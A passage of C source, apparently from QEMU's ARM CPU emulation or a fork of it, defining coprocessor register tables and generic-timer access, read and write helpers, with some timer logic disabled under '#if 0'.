15, .opc1 = 0, .crn = 8, .crm = 5, .opc2 = 2, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiasid_write }, /* 32 bit DTLB invalidates */ { .name = "DTLBIALL", .cp = 15, .opc1 = 0, .crn = 8, .crm = 6, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiall_write }, { .name = "DTLBIMVA", .cp = 15, .opc1 = 0, .crn = 8, .crm = 6, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimva_write }, { .name = "DTLBIASID", .cp = 15, .opc1 = 0, .crn = 8, .crm = 6, .opc2 = 2, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiasid_write }, /* 32 bit TLB invalidates */ { .name = "TLBIALL", .cp = 15, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiall_write }, { .name = "TLBIMVA", .cp = 15, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimva_write }, { .name = "TLBIASID", .cp = 15, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 2, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiasid_write }, { .name = "TLBIMVAA", .cp = 15, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 3, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimvaa_write }, REGINFO_SENTINEL }; static const ARMCPRegInfo v7mp_cp_reginfo[] = { /* 32 bit TLB invalidates, Inner Shareable */ { .name = "TLBIALLIS", .cp = 15, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiall_is_write }, { .name = "TLBIMVAIS", .cp = 15, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimva_is_write }, { .name = "TLBIASIDIS", .cp = 15, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 2, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbiasid_is_write }, { .name = "TLBIMVAAIS", .cp = 15, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 3, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimvaa_is_write }, REGINFO_SENTINEL }; static const ARMCPRegInfo pmovsset_cp_reginfo[] = { /* PMOVSSET is not implemented in v7 before v7ve */ { .name = "PMOVSSET", .cp = 15, .opc1 = 0, .crn = 9, .crm = 14, .opc2 = 3, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_ALIAS | ARM_CP_IO, .fieldoffset = offsetoflow32(CPUARMState, cp15.c9_pmovsr), .writefn = pmovsset_write, .raw_writefn = raw_write }, { .name = "PMOVSSET_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 9, .crm = 14, .opc2 = 3, .access = PL0_RW, .accessfn = pmreg_access, .type = ARM_CP_ALIAS | ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c9_pmovsr), .writefn = pmovsset_write, .raw_writefn = raw_write }, REGINFO_SENTINEL }; static void teecr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { value &= 1; env->teecr = value; } static CPAccessResult teehbr_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 0 && (env->teecr & 1)) { return CP_ACCESS_TRAP; } return CP_ACCESS_OK; } static const ARMCPRegInfo t2ee_cp_reginfo[] = { { .name = "TEECR", .cp = 14, .crn = 0, .crm = 0, .opc1 = 6, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, teecr), .resetvalue = 0, .writefn = teecr_write }, { .name = "TEEHBR", .cp = 14, .crn = 1, .crm = 0, .opc1 = 6, .opc2 = 0, .access = PL0_RW, .fieldoffset = offsetof(CPUARMState, teehbr), .accessfn = teehbr_access, .resetvalue = 0 }, REGINFO_SENTINEL }; static const ARMCPRegInfo v6k_cp_reginfo[] = { { .name = "TPIDR_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 2, .crn = 13, .crm = 0, .access = PL0_RW, .fieldoffset = offsetof(CPUARMState, cp15.tpidr_el[0]), .resetvalue = 0 }, { .name = "TPIDRURW", .cp = 15, .crn = 13, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL0_RW, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.tpidrurw_s), offsetoflow32(CPUARMState, cp15.tpidrurw_ns) }, .resetfn = arm_cp_reset_ignore }, { .name = "TPIDRRO_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 3, .crn = 13, .crm = 0, .access = PL0_R|PL1_W, .fieldoffset = offsetof(CPUARMState, cp15.tpidrro_el[0]), .resetvalue = 0}, { .name = "TPIDRURO", .cp = 15, .crn = 13, .crm = 0, .opc1 = 0, .opc2 = 3, .access = PL0_R|PL1_W, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.tpidruro_s), offsetoflow32(CPUARMState, cp15.tpidruro_ns) }, .resetfn = arm_cp_reset_ignore }, { .name = "TPIDR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .opc2 = 4, .crn = 13, .crm = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.tpidr_el[1]), .resetvalue = 0 }, { .name = "TPIDRPRW", .opc1 = 0, .cp = 15, .crn = 13, .crm = 0, .opc2 = 4, .access = PL1_RW, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.tpidrprw_s), offsetoflow32(CPUARMState, cp15.tpidrprw_ns) }, .resetvalue = 0 }, REGINFO_SENTINEL }; static CPAccessResult gt_cntfrq_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* CNTFRQ: not visible from PL0 if both PL0PCTEN and PL0VCTEN are zero. * Writable only at the highest implemented exception level. */ int el = arm_current_el(env); uint64_t hcr; uint32_t cntkctl; switch (el) { case 0: hcr = arm_hcr_el2_eff(env); if ((hcr & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { cntkctl = env->cp15.cnthctl_el2; } else { cntkctl = env->cp15.c14_cntkctl; } if (!extract32(cntkctl, 0, 2)) { return CP_ACCESS_TRAP; } break; case 1: if (!isread && ri->state == ARM_CP_STATE_AA32 && arm_is_secure_below_el3(env)) { /* Accesses from 32-bit Secure EL1 UNDEF (*not* trap to EL3!) */ return CP_ACCESS_TRAP_UNCATEGORIZED; } break; case 2: case 3: break; } if (!isread && el < arm_highest_el(env)) { return CP_ACCESS_TRAP_UNCATEGORIZED; } return CP_ACCESS_OK; } static CPAccessResult gt_counter_access(CPUARMState *env, int timeridx, bool isread) { unsigned int cur_el = arm_current_el(env); bool secure = arm_is_secure(env); uint64_t hcr = arm_hcr_el2_eff(env); switch (cur_el) { case 0: /* If HCR_EL2.<E2H,TGE> == '11': check CNTHCTL_EL2.EL0[PV]CTEN. */ if ((hcr & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { return (extract32(env->cp15.cnthctl_el2, timeridx, 1) ? CP_ACCESS_OK : CP_ACCESS_TRAP_EL2); } /* CNT[PV]CT: not visible from PL0 if EL0[PV]CTEN is zero */ if (!extract32(env->cp15.c14_cntkctl, timeridx, 1)) { return CP_ACCESS_TRAP; } /* If HCR_EL2.<E2H,TGE> == '10': check CNTHCTL_EL2.EL1PCTEN. */ if (hcr & HCR_E2H) { if (timeridx == GTIMER_PHYS && !extract32(env->cp15.cnthctl_el2, 10, 1)) { return CP_ACCESS_TRAP_EL2; } } else { /* If HCR_EL2.<E2H> == 0: check CNTHCTL_EL2.EL1PCEN. */ if (arm_feature(env, ARM_FEATURE_EL2) && timeridx == GTIMER_PHYS && !secure && !extract32(env->cp15.cnthctl_el2, 1, 1)) { return CP_ACCESS_TRAP_EL2; } } break; case 1: /* Check CNTHCTL_EL2.EL1PCTEN, which changes location based on E2H. */ if (arm_feature(env, ARM_FEATURE_EL2) && timeridx == GTIMER_PHYS && !secure && (hcr & HCR_E2H ? !extract32(env->cp15.cnthctl_el2, 10, 1) : !extract32(env->cp15.cnthctl_el2, 0, 1))) { return CP_ACCESS_TRAP_EL2; } break; } return CP_ACCESS_OK; } static CPAccessResult gt_timer_access(CPUARMState *env, int timeridx, bool isread) { unsigned int cur_el = arm_current_el(env); bool secure = arm_is_secure(env); uint64_t hcr = arm_hcr_el2_eff(env); switch (cur_el) { case 0: if ((hcr & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { /* If HCR_EL2.<E2H,TGE> == '11': check CNTHCTL_EL2.EL0[PV]TEN. */ return (extract32(env->cp15.cnthctl_el2, 9 - timeridx, 1) ? CP_ACCESS_OK : CP_ACCESS_TRAP_EL2); } /* * CNT[PV]_CVAL, CNT[PV]_CTL, CNT[PV]_TVAL: not visible from * EL0 if EL0[PV]TEN is zero. */ if (!extract32(env->cp15.c14_cntkctl, 9 - timeridx, 1)) { return CP_ACCESS_TRAP; } /* fall through */ case 1: if (arm_feature(env, ARM_FEATURE_EL2) && timeridx == GTIMER_PHYS && !secure) { if (hcr & HCR_E2H) { /* If HCR_EL2.<E2H,TGE> == '10': check CNTHCTL_EL2.EL1PTEN. */ if (!extract32(env->cp15.cnthctl_el2, 11, 1)) { return CP_ACCESS_TRAP_EL2; } } else { /* If HCR_EL2.<E2H> == 0: check CNTHCTL_EL2.EL1PCEN. */ if (!extract32(env->cp15.cnthctl_el2, 1, 1)) { return CP_ACCESS_TRAP_EL2; } } } break; } return CP_ACCESS_OK; } static CPAccessResult gt_pct_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { return gt_counter_access(env, GTIMER_PHYS, isread); } static CPAccessResult gt_vct_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { return gt_counter_access(env, GTIMER_VIRT, isread); } static CPAccessResult gt_ptimer_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { return gt_timer_access(env, GTIMER_PHYS, isread); } static CPAccessResult gt_vtimer_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { return gt_timer_access(env, GTIMER_VIRT, isread); } static CPAccessResult gt_stimer_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* The AArch64 register view of the secure physical timer is * always accessible from EL3, and configurably accessible from * Secure EL1. */ switch (arm_current_el(env)) { case 1: if (!arm_is_secure(env)) { return CP_ACCESS_TRAP; } if (!(env->cp15.scr_el3 & SCR_ST)) { return CP_ACCESS_TRAP_EL3; } return CP_ACCESS_OK; case 0: case 2: return CP_ACCESS_TRAP; case 3: return CP_ACCESS_OK; default: g_assert_not_reached(); // never reach here return CP_ACCESS_OK; } } static uint64_t gt_get_countervalue(CPUARMState *env) { ARMCPU *cpu = env_archcpu(env); return qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) / gt_cntfrq_period_ns(cpu); } static void gt_recalc_timer(ARMCPU *cpu, int timeridx) { #if 0 ARMGenericTimer *gt = &cpu->env.cp15.c14_timer[timeridx]; if (gt->ctl & 1) { /* Timer enabled: calculate and set current ISTATUS, irq, and * reset timer to when ISTATUS next has to change */ uint64_t offset = timeridx == GTIMER_VIRT ? cpu->env.cp15.cntvoff_el2 : 0; uint64_t count = gt_get_countervalue(&cpu->env); /* Note that this must be unsigned 64 bit arithmetic: */ int istatus = count - offset >= gt->cval; uint64_t nexttick; int irqstate; gt->ctl = deposit32(gt->ctl, 2, 1, istatus); irqstate = (istatus && !(gt->ctl & 2)); qemu_set_irq(cpu->gt_timer_outputs[timeridx], irqstate); if (istatus) { /* Next transition is when count rolls back over to zero */ nexttick = UINT64_MAX; } else { /* Next transition is when we hit cval */ nexttick = gt->cval + offset; } /* Note that the desired next expiry time might be beyond the * signed-64-bit range of a QEMUTimer -- in this case we just * set the timer for as far in the future as possible. When the * timer expires we will reset the timer for any remaining period. */ if (nexttick > INT64_MAX / gt_cntfrq_period_ns(cpu)) { timer_mod_ns(cpu->gt_timer[timeridx], INT64_MAX); } else { timer_mod(cpu->gt_timer[timeridx], nexttick); } trace_arm_gt_recalc(timeridx, irqstate, nexttick); } else { /* Timer disabled: ISTATUS and timer output always clear */ gt->ctl &= ~4; qemu_set_irq(cpu->gt_timer_outputs[timeridx], 0); timer_del(cpu->gt_timer[timeridx]); trace_arm_gt_recalc_disabled(timeridx); } #endif } static void gt_timer_reset(CPUARMState *env, const ARMCPRegInfo *ri, int timeridx) { #if 0 ARMCPU *cpu = env_archcpu(env); timer_del(cpu->gt_timer[timeridx]); #endif } static uint64_t gt_cnt_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_get_countervalue(env); } static uint64_t gt_virt_cnt_offset(CPUARMState *env) { uint64_t hcr; switch (arm_current_el(env)) { case 2: hcr = arm_hcr_el2_eff(env); if (hcr & HCR_E2H) { return 0; } break; case 0: hcr = arm_hcr_el2_eff(env); if ((hcr & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { return 0; } break; } return env->cp15.cntvoff_el2; } static uint64_t gt_virt_cnt_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_get_countervalue(env) - gt_virt_cnt_offset(env); } static void gt_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, int timeridx, uint64_t value) { #if 0 trace_arm_gt_cval_write(timeridx, value); env->cp15.c14_timer[timeridx].cval = value; gt_recalc_timer(env_archcpu(env), timeridx); #endif } static uint64_t gt_tval_read(CPUARMState *env, const ARMCPRegInfo *ri, int timeridx) { uint64_t offset = 0; switch (timeridx) { case GTIMER_VIRT: case GTIMER_HYPVIRT: offset = gt_virt_cnt_offset(env); break; } return (uint32_t)(env->cp15.c14_timer[timeridx].cval - (gt_get_countervalue(env) - offset)); } static void gt_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, int timeridx, uint64_t value) { uint64_t offset = 0; switch (timeridx) { case GTIMER_VIRT: case GTIMER_HYPVIRT: offset = gt_virt_cnt_offset(env); break; } env->cp15.c14_timer[timeridx].cval = gt_get_countervalue(env) - offset + sextract64(value, 0, 32); gt_recalc_timer(env_archcpu(env), timeridx); } static void gt_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, int timeridx, uint64_t value) { #if 0 ARMCPU *cpu = env_archcpu(env); uint32_t oldval = env->cp15.c14_timer[timeridx].ctl; env->cp15.c14_timer[timeridx].ctl = deposit64(oldval, 0, 2, value); if ((oldval ^ value) & 1) { /* Enable toggled */ gt_recalc_timer(cpu, timeridx); } else if ((oldval ^ value) & 2) { /* IMASK toggled: don't need to recalculate, * just set the interrupt line based on ISTATUS */ int irqstate = (oldval & 4) && !(value & 2); qemu_set_irq(cpu->gt_timer_outputs[timeridx], irqstate); } #endif } static void gt_phys_timer_reset(CPUARMState *env, const ARMCPRegInfo *ri) { gt_timer_reset(env, ri, GTIMER_PHYS); } static void gt_phys_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_cval_write(env, ri, GTIMER_PHYS, value); } static uint64_t gt_phys_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_tval_read(env, ri, GTIMER_PHYS); } static void gt_phys_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_tval_write(env, ri, GTIMER_PHYS, value); } static void gt_phys_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_ctl_write(env, ri, GTIMER_PHYS, value); } static int gt_phys_redir_timeridx(CPUARMState *env) { switch (arm_mmu_idx(env)) { case ARMMMUIdx_E20_0: case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: return GTIMER_HYP; default: return GTIMER_PHYS; } } static int gt_virt_redir_timeridx(CPUARMState *env) { switch (arm_mmu_idx(env)) { case ARMMMUIdx_E20_0: case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: return GTIMER_HYPVIRT; default: return GTIMER_VIRT; } } static uint64_t gt_phys_redir_cval_read(CPUARMState *env, const ARMCPRegInfo *ri) { int timeridx = gt_phys_redir_timeridx(env); return env->cp15.c14_timer[timeridx].cval; } static void gt_phys_redir_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int timeridx = gt_phys_redir_timeridx(env); gt_cval_write(env, ri, timeridx, value); } static uint64_t gt_phys_redir_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { int timeridx = gt_phys_redir_timeridx(env); return gt_tval_read(env, ri, timeridx); } static void gt_phys_redir_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int timeridx = gt_phys_redir_timeridx(env); gt_tval_write(env, ri, timeridx, value); } static uint64_t gt_phys_redir_ctl_read(CPUARMState *env, const ARMCPRegInfo *ri) { int timeridx = gt_phys_redir_timeridx(env); return env->cp15.c14_timer[timeridx].ctl; } static void gt_phys_redir_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int timeridx = gt_phys_redir_timeridx(env); gt_ctl_write(env, ri, timeridx, value); } static void gt_virt_timer_reset(CPUARMState *env, const ARMCPRegInfo *ri) { gt_timer_reset(env, ri, GTIMER_VIRT); } static void gt_virt_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_cval_write(env, ri, GTIMER_VIRT, value); } static uint64_t gt_virt_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_tval_read(env, ri, GTIMER_VIRT); } static void gt_virt_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_tval_write(env, ri, GTIMER_VIRT, value); } static void gt_virt_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_ctl_write(env, ri, GTIMER_VIRT, value); } static void gt_cntvoff_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); raw_write(env, ri, value); gt_recalc_timer(cpu, GTIMER_VIRT); } static uint64_t gt_virt_redir_cval_read(CPUARMState *env, const ARMCPRegInfo *ri) { int timeridx = gt_virt_redir_timeridx(env); return env->cp15.c14_timer[timeridx].cval; } static void gt_virt_redir_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int timeridx = gt_virt_redir_timeridx(env); gt_cval_write(env, ri, timeridx, value); } static uint64_t gt_virt_redir_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { int timeridx = gt_virt_redir_timeridx(env); return gt_tval_read(env, ri, timeridx); } static void gt_virt_redir_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int timeridx = gt_virt_redir_timeridx(env); gt_tval_write(env, ri, timeridx, value); } static uint64_t gt_virt_redir_ctl_read(CPUARMState *env, const ARMCPRegInfo *ri) { int timeridx = gt_virt_redir_timeridx(env); return env->cp15.c14_timer[timeridx].ctl; } static void gt_virt_redir_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { int timeridx = gt_virt_redir_timeridx(env); gt_ctl_write(env, ri, timeridx, value); } static void gt_hyp_timer_reset(CPUARMState *env, const ARMCPRegInfo *ri) { gt_timer_reset(env, ri, GTIMER_HYP); } static void gt_hyp_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_cval_write(env, ri, GTIMER_HYP, value); } static uint64_t gt_hyp_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_tval_read(env, ri, GTIMER_HYP); } static void gt_hyp_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_tval_write(env, ri, GTIMER_HYP, value); } static void gt_hyp_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_ctl_write(env, ri, GTIMER_HYP, value); } static void gt_sec_timer_reset(CPUARMState *env, const ARMCPRegInfo *ri) { gt_timer_reset(env, ri, GTIMER_SEC); } static void gt_sec_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_cval_write(env, ri, GTIMER_SEC, value); } static uint64_t gt_sec_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_tval_read(env, ri, GTIMER_SEC); } static void gt_sec_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_tval_write(env, ri, GTIMER_SEC, value); } static void gt_sec_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_ctl_write(env, ri, GTIMER_SEC, value); } static void gt_hv_timer_reset(CPUARMState *env, const ARMCPRegInfo *ri) { gt_timer_reset(env, ri, GTIMER_HYPVIRT); } static void gt_hv_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_cval_write(env, ri, GTIMER_HYPVIRT, value); } static uint64_t gt_hv_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) { return gt_tval_read(env, ri, GTIMER_HYPVIRT); } static void gt_hv_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_tval_write(env, ri, GTIMER_HYPVIRT, value); } static void gt_hv_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { gt_ctl_write(env, ri, GTIMER_HYPVIRT, value); } void arm_gt_ptimer_cb(void *opaque) { ARMCPU *cpu = opaque; gt_recalc_timer(cpu, GTIMER_PHYS); } void arm_gt_vtimer_cb(void *opaque) { ARMCPU *cpu = opaque; gt_recalc_timer(cpu, GTIMER_VIRT); } void arm_gt_htimer_cb(void *opaque) { ARMCPU *cpu = opaque; gt_recalc_timer(cpu, GTIMER_HYP); } void arm_gt_stimer_cb(void *opaque) { ARMCPU *cpu = opaque; gt_recalc_timer(cpu, GTIMER_SEC); } void arm_gt_hvtimer_cb(void *opaque) { ARMCPU *cpu = opaque; gt_recalc_timer(cpu, GTIMER_HYPVIRT); } static void arm_gt_cntfrq_reset(CPUARMState *env, const ARMCPRegInfo *opaque) { ARMCPU *cpu = env_archcpu(env); cpu->env.cp15.c14_cntfrq = cpu->gt_cntfrq_hz; } static const ARMCPRegInfo generic_timer_cp_reginfo[] = { /* Note that CNTFRQ is purely reads-as-written for the benefit * of software; writing it doesn't actually change the timer frequency. * Our reset value matches the fixed frequency we implement the timer at. */ { .name = "CNTFRQ", .cp = 15, .crn = 14, .crm = 0, .opc1 = 0, .opc2 = 0, .type = ARM_CP_ALIAS, .access = PL1_RW | PL0_R, .accessfn = gt_cntfrq_access, .fieldoffset = offsetoflow32(CPUARMState, cp15.c14_cntfrq), }, { .name = "CNTFRQ_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 0, .opc2 = 0, .access = PL1_RW | PL0_R, .accessfn = gt_cntfrq_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_cntfrq), .resetfn = arm_gt_cntfrq_reset, }, /* overall control: mostly access permissions */ { .name = "CNTKCTL", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 14, .crm = 1, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c14_cntkctl), .resetvalue = 0, }, /* per-timer control */ { .name = "CNTP_CTL", .cp = 15, .crn = 14, .crm = 2, .opc1 = 0, .opc2 = 1, .secure = ARM_CP_SECSTATE_NS, .type = ARM_CP_IO | ARM_CP_ALIAS, .access = PL0_RW, .accessfn = gt_ptimer_access, .fieldoffset = offsetoflow32(CPUARMState, cp15.c14_timer[GTIMER_PHYS].ctl), .readfn = gt_phys_redir_ctl_read, .raw_readfn = raw_read, .writefn = gt_phys_redir_ctl_write, .raw_writefn = raw_write, }, { .name = "CNTP_CTL_S", .cp = 15, .crn = 14, .crm = 2, .opc1 = 0, .opc2 = 1, .secure = ARM_CP_SECSTATE_S, .type = ARM_CP_IO | ARM_CP_ALIAS, .access = PL0_RW, .accessfn = gt_ptimer_access, .fieldoffset = offsetoflow32(CPUARMState, cp15.c14_timer[GTIMER_SEC].ctl), .writefn = gt_sec_ctl_write, .raw_writefn = raw_write, }, { .name = "CNTP_CTL_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 2, .opc2 = 1, .type = ARM_CP_IO, .access = PL0_RW, .accessfn = gt_ptimer_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].ctl), .resetvalue = 0, .readfn = gt_phys_redir_ctl_read, .raw_readfn = raw_read, .writefn = gt_phys_redir_ctl_write, .raw_writefn = raw_write, }, { .name = "CNTV_CTL", .cp = 15, .crn = 14, .crm = 3, .opc1 = 0, .opc2 = 1, .type = ARM_CP_IO | ARM_CP_ALIAS, .access = PL0_RW, .accessfn = gt_vtimer_access, .fieldoffset = offsetoflow32(CPUARMState, cp15.c14_timer[GTIMER_VIRT].ctl), .readfn = gt_virt_redir_ctl_read, .raw_readfn = raw_read, .writefn = gt_virt_redir_ctl_write, .raw_writefn = raw_write, }, { .name = "CNTV_CTL_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 3, .opc2 = 1, .type = ARM_CP_IO, .access = PL0_RW, .accessfn = gt_vtimer_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].ctl), .resetvalue = 0, .readfn = gt_virt_redir_ctl_read, .raw_readfn = raw_read, .writefn = gt_virt_redir_ctl_write, .raw_writefn = raw_write, }, /* TimerValue views: a 32 bit downcounting view of the underlying state */ { .name = "CNTP_TVAL", .cp = 15, .crn = 14, .crm = 2, .opc1 = 0, .opc2 = 0, .secure = ARM_CP_SECSTATE_NS, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL0_RW, .accessfn = gt_ptimer_access, .readfn = gt_phys_redir_tval_read, .writefn = gt_phys_redir_tval_write, }, { .name = "CNTP_TVAL_S", .cp = 15, .crn = 14, .crm = 2, .opc1 = 0, .opc2 = 0, .secure = ARM_CP_SECSTATE_S, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL0_RW, .accessfn = gt_ptimer_access, .readfn = gt_sec_tval_read, .writefn = gt_sec_tval_write, }, { .name = "CNTP_TVAL_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 2, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL0_RW, .accessfn = gt_ptimer_access, .resetfn = gt_phys_timer_reset, .readfn = gt_phys_redir_tval_read, .writefn = gt_phys_redir_tval_write, }, { .name = "CNTV_TVAL", .cp = 15, .crn = 14, .crm = 3, .opc1 = 0, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL0_RW, .accessfn = gt_vtimer_access, .readfn = gt_virt_redir_tval_read, .writefn = gt_virt_redir_tval_write, }, { .name = "CNTV_TVAL_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 3, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL0_RW, .accessfn = gt_vtimer_access, .resetfn = gt_virt_timer_reset, .readfn = gt_virt_redir_tval_read, .writefn = gt_virt_redir_tval_write, }, /* The counter itself */ { .name = "CNTPCT", .cp = 15, .crm = 14, .opc1 = 0, .access = PL0_R, .type = ARM_CP_64BIT | ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = gt_pct_access, .readfn = gt_cnt_read, .resetfn = arm_cp_reset_ignore, }, { .name = "CNTPCT_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 0, .opc2 = 1, .access = PL0_R, .type = ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = gt_pct_access, .readfn = gt_cnt_read, }, { .name = "CNTVCT", .cp = 15, .crm = 14, .opc1 = 1, .access = PL0_R, .type = ARM_CP_64BIT | ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = gt_vct_access, .readfn = gt_virt_cnt_read, .resetfn = arm_cp_reset_ignore, }, { .name = "CNTVCT_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 0, .opc2 = 2, .access = PL0_R, .type = ARM_CP_NO_RAW | ARM_CP_IO, .accessfn = gt_vct_access, .readfn = gt_virt_cnt_read, }, /* Comparison value, indicating when the timer goes off */ { .name = "CNTP_CVAL", .cp = 15, .crm = 14, .opc1 = 2, .secure = ARM_CP_SECSTATE_NS, .access = PL0_RW, .type = ARM_CP_64BIT | ARM_CP_IO | ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].cval), .accessfn = gt_ptimer_access, .readfn = gt_phys_redir_cval_read, .raw_readfn = raw_read, .writefn = gt_phys_redir_cval_write, .raw_writefn = raw_write, }, { .name = "CNTP_CVAL_S", .cp = 15, .crm = 14, .opc1 = 2, .secure = ARM_CP_SECSTATE_S, .access = PL0_RW, .type = ARM_CP_64BIT | ARM_CP_IO | ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_SEC].cval), .accessfn = gt_ptimer_access, .writefn = gt_sec_cval_write, .raw_writefn = raw_write, }, { .name = "CNTP_CVAL_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 2, .opc2 = 2, .access = PL0_RW, .type = ARM_CP_IO, .fieldoffset = 